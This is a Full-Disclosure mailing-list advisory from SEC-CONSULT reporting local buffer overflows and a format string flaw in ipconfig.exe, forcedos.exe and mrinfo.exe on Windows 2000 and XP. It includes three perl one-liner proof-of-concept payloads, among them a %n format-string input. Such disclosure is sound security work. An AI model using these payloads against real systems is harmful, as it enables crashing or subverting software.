======================================== Microsoft commandline tools BOF s ========================================
Product: Windows-2000 SP4 / Windows-XP SP2 Vulnerablities: - Buffer Overflow (no privilege escalation) Vendor: Microsoft (http://www.microsoft.com/) Vendor-Status: vendor contacted (between 2002 and 2003) Vendor-Patches: ipconfig (XP-SP 2) / forcedos.exe and mrinfo.exe not available Objects: ipconfig.exe / forcedos.exe / mrinfo.exe Exploitable: Local: PARTIAL Remote: NO ============ Introduction ============ --- ===================== Vulnerability Details ===================== 1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY ======================================================= OBJECTS: ipconfig.exe (only Windows-2000 SP4) forcedos.exe mrinfo.exe DESCRIPTION: Insufficient input-validation leads to a) stack based bufferoverflows and b) format string- vulnerabilites. EXAMPLES: a) ipconfig.exe /`perl -e 'print "PAAAA\x44\x33\x22\x11","%08x"x13,"%n";'` b) forcedos.exe `perl -e 'print "A"x6784;'` c) mrinfo.exe -i `perl -e 'print "A"x60;'` =============== GENERAL REMARKS =============== Find related postings regarding this issue here: (http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html). It is unlikely you to gain access or elevate priviledges thru "forcedos.exe" and "mrinfo.exe". Nevertheless it might be possible to misuse "ipconfig.exe" in an "restricted" environment with DHCP enabled !! ==================== Recommended Hotfixes ==================== --- EOF @2003 [EMAIL PROTECTED],[EMAIL PROTECTED] ======= Contact ======= SEC-CONSULT UK / EUROPE Austria / EUROPE [EMAIL PROTECTED] [EMAIL PROTECTED] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
